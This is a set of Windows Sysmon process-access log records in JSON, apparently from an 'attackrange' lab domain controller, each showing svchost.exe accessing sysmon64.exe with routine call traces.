{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1352,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1353,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.142\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.142","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1354,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.142\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.142","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1355,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.142\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.142","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1356,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.142\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.142","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1357,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.142\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.142","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1358,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.142\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.142","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1359,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.142\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.142","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
